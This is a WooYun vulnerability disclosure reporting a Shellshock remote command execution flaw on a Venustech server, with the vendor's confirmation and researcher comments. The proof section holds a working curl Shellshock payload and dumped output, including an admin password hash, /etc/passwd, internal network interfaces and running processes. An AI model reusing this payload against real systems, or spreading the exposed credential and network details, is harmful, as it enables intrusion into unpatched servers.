当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170913

漏洞标题:启明星辰某服务器存在远程命令执行漏洞

相关厂商:北京启明星辰信息安全技术有限公司

漏洞作者: 猪猪侠

提交时间:2016-01-18 18:27

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

启明星辰某服务器存在远程命令执行漏洞,服务器有4块网卡,设置了7个C段的内网IP地址

详细说明:

#1 服务器
https://updates.venustech.com.cn/
#2 漏洞描述
Bash shellshock Vul

? (192.168.7.49) at 00:13:20:bf:a3:eb [ether] on eth3.2
? (192.168.7.170) at 04:7d:7b:b4:63:f8 [ether] on eth3.2
? (192.168.5.67) at 90:b1:1c:6c:95:e4 [ether] on eth3.3
? (192.168.7.147) at d0:67:e5:06:d6:22 [ether] on eth3.2
? (192.168.99.99) at 00:90:fb:52:60:7d [ether] on eth5
? (124.207.17.78) at <incomplete> on eth3.7
? (192.168.9.15) at 96:6c:d2:0b:8c:f3 [ether] on eth3.7
? (192.168.5.33) at 78:45:c4:05:bc:b4 [ether] on eth3.3
? (124.207.17.65) at 00:12:43:78:58:00 [ether] on eth2
? (124.207.17.74) at <incomplete> on eth3.7
? (192.168.9.109) at 1a:97:a3:0a:c5:8b [ether] on eth3.4
? (192.168.7.45) at 00:22:19:04:bf:4e [ether] on eth3.2
? (124.207.17.70) at <incomplete> on eth3.8
? (192.168.9.10) at 14:fe:b5:d4:25:6f [ether] on eth3.7
? (192.168.9.8) at a6:d1:84:f1:a6:a8 [ether] on eth3.7
? (124.207.17.76) at <incomplete> on eth3.7
? (192.168.5.30) at 18:03:73:37:47:34 [ether] on eth3.3
? (124.207.17.77) at a6:d1:84:f1:a6:a8 [ether] on eth3.7
? (192.168.7.222) at 38:22:d6:a1:27:dc [ether] on eth3.2
? (192.168.5.200) at 78:45:c4:06:0e:7f [ether] on eth3.3
? (192.168.7.179) at <incomplete> on eth3.2
? (192.168.99.20) at b8:ac:6f:3e:b9:24 [ether] on eth5
? (192.168.9.9) at 3e:54:4b:28:95:13 [ether] on eth3.7
? (192.168.7.196) at 68:f7:28:b9:c9:97 [ether] on eth3.2
? (192.168.99.230) at b0:51:8e:00:dc:e3 [ether] on eth5
? (192.168.7.153) at 1c:fa:68:fe:b9:49 [ether] on eth3.2
? (192.168.5.85) at 78:a1:06:a0:93:f3 [ether] on eth3.3
? (192.168.9.103) at 00:19:d1:5a:5c:91 [ether] on eth3.4


eth2      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:28  
          inet addr:124.207.17.66  Bcast:124.207.17.67  Mask:255.255.255.252
          inet6 addr: fe80::2e0:4cff:fe50:2928/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:509587196 errors:0 dropped:150 overruns:0 frame:0
          TX packets:447431051 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:477215383114 (444.4 GiB)  TX bytes:102776363246 (95.7 GiB)
          Interrupt:18 Memory:d0200000-d0220000 
eth3      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2753536727 errors:0 dropped:6301 overruns:0 frame:0
          TX packets:2704033675 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2398944004498 (2.1 TiB)  TX bytes:2645235946740 (2.4 TiB)
          Interrupt:19 Memory:d0300000-d0320000 
eth5      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:2b  
          inet addr:192.168.99.1  Bcast:192.168.99.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:292b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2775236580 errors:0 dropped:1087224 overruns:0 frame:0
          TX packets:168683223 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:215766978251 (200.9 GiB)  TX bytes:159408116401 (148.4 GiB)
          Interrupt:17 Memory:d0500000-d0520000 
eth3.2    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.7.1  Bcast:192.168.7.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:139999170 errors:0 dropped:0 overruns:0 frame:0
          TX packets:178749034 errors:0 dropped:49 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24650666919 (22.9 GiB)  TX bytes:196673483318 (183.1 GiB)
eth3.3    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:827207656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1659932700 errors:0 dropped:441 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:71391019200 (66.4 GiB)  TX bytes:2305127162311 (2.0 TiB)
eth3.4    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.9.97  Bcast:192.168.9.127  Mask:255.255.255.224
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38196894 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32701192 errors:0 dropped:546 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:38057682408 (35.4 GiB)  TX bytes:21081238644 (19.6 GiB)
eth3.5    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12150050 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15849901 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2263388346 (2.1 GiB)  TX bytes:15154916440 (14.1 GiB)
eth3.6    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.10.1  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:96227890 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7267281 errors:0 dropped:39 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:8879882984 (8.2 GiB)  TX bytes:7411205232 (6.9 GiB)
eth3.7    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:192.168.9.1  Bcast:192.168.9.31  Mask:255.255.255.224
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1639751756 errors:0 dropped:0 overruns:0 frame:0
          TX packets:809504545 errors:0 dropped:21 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2215151596571 (2.0 TiB)  TX bytes:99786721439 (92.9 GiB)
eth3.8    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29  
          inet addr:124.207.17.69  Bcast:124.207.17.71  Mask:255.255.255.252
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3311 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29016 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:253892 (247.9 KiB)  TX bytes:1218888 (1.1 MiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:86767 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86767 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:113560276 (108.2 MiB)  TX bytes:113560276 (108.2 MiB)

漏洞证明:

#3 证明

curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	 localhost       USAP 
192.168.9.125    update.lyxtech.com


admin:$6$3Z7FbI1E$Tdnx3/Yx8cqq1xZzbobGnBo91MAR9RPjnixIjSy2tx0X943RONZLLAlLScvOXj5sLPy3du2EX9iMKKMzYqe60/:16287:0:99999:7:::
sshd:!!:13153:0:99999:7:::
ldap:!!:13153:0:99999:7:::
mysql:!!:13195:0:99999:7:::


cat /etc/passwd 
admin:x:0:0:root:/usap/boot:/bin/bash
daemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologin
www:x:33:33:www:/usr/local/usap/center/web:/bin/nologin
sshd:x:74:74::/var/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
mysql:x:500:500::/home/mysql:/sbin/nologin


UID        PID  PPID  C STIME TTY          TIME CMD
admin        1     0  0  2015 ?        00:03:17 init [2]  
admin        2     0  0  2015 ?        00:00:00 [kthreadd]
admin        3     2  0  2015 ?        00:00:04 [migration/0]
admin        4     2  0  2015 ?        00:48:19 [ksoftirqd/0]
admin        5     2  0  2015 ?        00:00:00 [watchdog/0]
admin        6     2  0  2015 ?        00:00:09 [migration/1]
admin        7     2 11  2015 ?        11-08:44:30 [ksoftirqd/1]
admin        8     2  0  2015 ?        00:00:00 [watchdog/1]
admin        9     2  0  2015 ?        00:15:58 [events/0]
admin       10     2  0  2015 ?        00:07:19 [events/1]
admin       11     2  0  2015 ?        00:00:00 [cpuset]
admin       12     2  0  2015 ?        00:00:00 [khelper]
admin       13     2  0  2015 ?        00:00:00 [netns]
admin       14     2  0  2015 ?        00:00:00 [async/mgr]
admin       15     2  0  2015 ?        00:00:00 [pm]
admin       16     2  0  2015 ?        00:00:10 [sync_supers]
admin       17     2  0  2015 ?        00:00:16 [bdi-default]
admin       18     2  0  2015 ?        00:00:00 [kintegrityd/0]
admin       19     2  0  2015 ?        00:00:00 [kintegrityd/1]
admin       20     2  0  2015 ?        00:00:07 [kblockd/0]
admin       21     2  0  2015 ?        00:00:10 [kblockd/1]
admin       22     2  0  2015 ?        00:00:16 [kacpid]
admin       23     2  0  2015 ?        00:00:01 [kacpi_notify]
admin       24     2  0  2015 ?        00:00:00 [kacpi_hotplug]
admin       25     2  0  2015 ?        00:00:00 [kseriod]
admin       28     2  0  2015 ?        01:15:21 [kondemand/0]
admin       29     2  0  2015 ?        01:17:09 [kondemand/1]
admin       30     2  0  2015 ?        00:00:02 [khungtaskd]
admin       31     2  0  2015 ?        00:00:27 [kswapd0]
admin       32     2  0  2015 ?        00:00:00 [ksmd]
admin       33     2  0  2015 ?        00:00:00 [aio/0]
admin       34     2  0  2015 ?        00:00:00 [aio/1]
admin       35     2  0  2015 ?        00:00:00 [xfs_mru_cache]
admin       36     2  0  2015 ?        00:02:06 [xfslogd/0]
admin       37     2  0  2015 ?        00:00:00 [xfslogd/1]
admin       38     2  0  2015 ?        00:05:10 [xfsdatad/0]
admin       39     2  0  2015 ?        00:00:00 [xfsdatad/1]
admin       40     2  0  2015 ?        00:00:00 [xfsconvertd/0]
admin       41     2  0  2015 ?        00:00:00 [xfsconvertd/1]
admin       42     2  0  2015 ?        00:00:00 [crypto/0]
admin       43     2  0  2015 ?        00:00:00 [crypto/1]
admin      279     2  0  2015 ?        00:00:00 [ksuspend_usbd]
admin      280     2  0  2015 ?        00:00:00 [ata/0]
admin      281     2  0  2015 ?        00:00:00 [khubd]
admin      282     2  0  2015 ?        00:00:00 [ata/1]
admin      283     2  0  2015 ?        00:00:00 [ata_aux]
admin      284     2  0  2015 ?        00:00:00 [scsi_eh_0]
admin      285     2  0  2015 ?        00:00:00 [scsi_eh_1]
admin      290     2  0  2015 ?        00:00:00 [scsi_eh_2]
admin      291     2  0  2015 ?        00:00:00 [scsi_eh_3]
admin      324     2  0  2015 ?        00:03:33 [flush-8:0]
admin      469     2  0  2015 ?        00:00:31 [xfsbufd]
admin      470     2  0  2015 ?        00:00:44 [xfsaild]
admin      471     2  0  2015 ?        00:00:02 [xfssyncd]
admin      473     2  0  2015 ?        00:00:47 [xfsbufd]
admin      474     2  0  2015 ?        00:00:49 [xfsaild]
admin      475     2  0  2015 ?        00:00:04 [xfssyncd]
admin      477     2  0  2015 ?        00:00:00 [loop0]
admin      581     1  0  2015 ?        00:00:00 udevd --daemon
admin      635   581  0  2015 ?        00:00:00 udevd --daemon
admin      636   581  0  2015 ?        00:00:00 udevd --daemon
admin      670     2  0  2015 ?        00:00:00 [kconservative/0]
admin      671     2  0  2015 ?        00:00:00 [kconservative/1]
admin      722     2  0  2015 ?        00:00:00 [USAPTASK]
admin      723     2  0  2015 ?        00:00:00 [KUSHSNDMSG]
admin      729     2  0  2015 ?        00:00:03 [kClearNet]
admin      773     1  0  2015 ?        00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/DB --pid-file=/usr/local/mysql/DB/NSG.pid
mysql     1269   773  1  2015 ?        1-07:42:01 /usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/DB --plugin-dir=/usr/local/mysql/lib/plugin --user=mysql --log-error=/usr/local/mysql/DB/NSG.err --pid-file=/usr/local/mysql/DB/NSG.pid --socket=/tmp/mysql.sock --port=3306
admin     1453     1  0  2015 ?        00:18:19 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
admin     1464     1  0  2015 ?        00:32:10 /usr/bin/rsyslogd -c4
admin     1541     1  0  2015 ?        00:03:45 /usr/local/usap/center/bin/billingd
admin     1565     1  0  2015 ?        01:51:21 /usr/local/usap/center/bin/dbbackupd
admin     1567     1  0  2015 ?        00:00:00 /usr/local/usap/center/bin/ipmacbind_record
admin     1585     1  0  2015 ?        01:11:57 /usr/local/usap/center/bin/HDMonitor
admin     1594     1  0  2015 ?        00:02:10 /sbin/dhcpd -cf /usr/local/usap/center/config/dhcpd.conf eth3.2 start
admin     1597     1  0  2015 ?        01:05:50 /usr/local/usap/center/bin/bwserverd
admin     2103     1  0  2015 ?        00:16:44 /sbin/sshd
admin     2106     1  0  2015 ?        00:00:15 /usr/bin/cron
admin     2107     1  0  2015 tty1     00:00:00 /sbin/getty 38400 tty1
admin     2108     1  0  2015 ttyS0    00:00:00 /sbin/getty -L 9600 ttyS0 vt100
admin    19474 20565  3 Jan04 ?        11:58:15 /usr/local/usap/center/bin/ClearNet -D
admin    19478     2  0 Jan04 ?        00:04:09 [KernelDPI]
admin    20565     1  0  2015 ?        00:00:00 /usr/local/usap/center/bin/ClearNet -D
admin    21691  1453  0 18:22 ?        00:00:00 /usr/local/usap/center/web/login.cgi
admin    21694 21691  0 18:22 ?        00:00:00 sh -c rm -rf /tmp/tmp_arptable
admin    21695 21694  0 18:22 ?        00:00:00 /bin/ps -ef

修复方案:

更新或者下线

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-20 17:58

厂商回复:

这个是第三方厂商的系统,之前处于测试状态未正式启用。经测试确认问题存在,现已下线跟三方厂商联系修补。 多谢猪猪侠。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-18 18:32 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)

    沙发

  2. 2016-01-18 18:36 | 土夫子 ( 普通白帽子 | Rank:453 漏洞数:80 | 看似山穷水尽,终将柳暗花明)

    pa pa pa

  3. 2016-01-18 18:58 | 带馅儿馒头 认证白帽子 ( 核心白帽子 | Rank:1325 漏洞数:150 | 心在,梦在)

    猪哥V5

  4. 2016-01-18 19:03 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)

    屌屌屌

  5. 2016-01-18 20:17 | 坏男孩-A_A ( 实习白帽子 | Rank:41 漏洞数:17 | 膜拜学习中)

    666

  6. 2016-01-18 20:20 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    猪哥年底了,给程序猿留条活路啊!

  7. 2016-01-18 21:04 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    年底了。。

  8. 2016-01-18 21:58 | getshell1993 认证白帽子 ( 核心白帽子 | Rank:898 漏洞数:99 | ~!@#¥%……&*)

    停不下来啊....

  9. 2016-01-18 22:17 | 毛毛虫 ( 普通白帽子 | Rank:143 漏洞数:46 | 执著->寂寞->孤单->绽放)

    猪哥就是牛牛牛!!!

  10. 2016-01-18 22:25 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)

    你看,我说对了吧,猪猪侠是在年底大冲刺,各大厂商都会来一发或者多发,让程序员加班的

  11. 2016-01-19 00:32 | 少宇 ( 路人 | Rank:18 漏洞数:7 | 多看书,多实践,多泡妹子!!)

    快年底了,还让不让人愉快地过年了!

  12. 2016-01-19 08:40 | luwikes ( 普通白帽子 | Rank:532 漏洞数:79 | 潜心学习~~~)

    猪猪侠对各大安全厂商的安全做了简单测试

  13. 2016-01-19 09:48 | 齐迹 ( 普通白帽子 | Rank:790 漏洞数:103 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    请猪猪侠来我网逛逛。>_<

  14. 2016-01-19 09:55 | 路人毛 ( 实习白帽子 | Rank:66 漏洞数:27 | Please speak in Chinese.)

    存货都出来了

  15. 2016-01-19 13:06 | 换个昵称 ( 路人 | Rank:9 漏洞数:4 | 1)

    年终奖没了你赔呀

  16. 2016-02-23 10:11 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    猪猪侠扫描器真腻害

  17. 2016-02-25 15:19 | H.U.C-人 族 ( 路人 | Rank:9 漏洞数:4 | 热爱网络安全)

    求跟班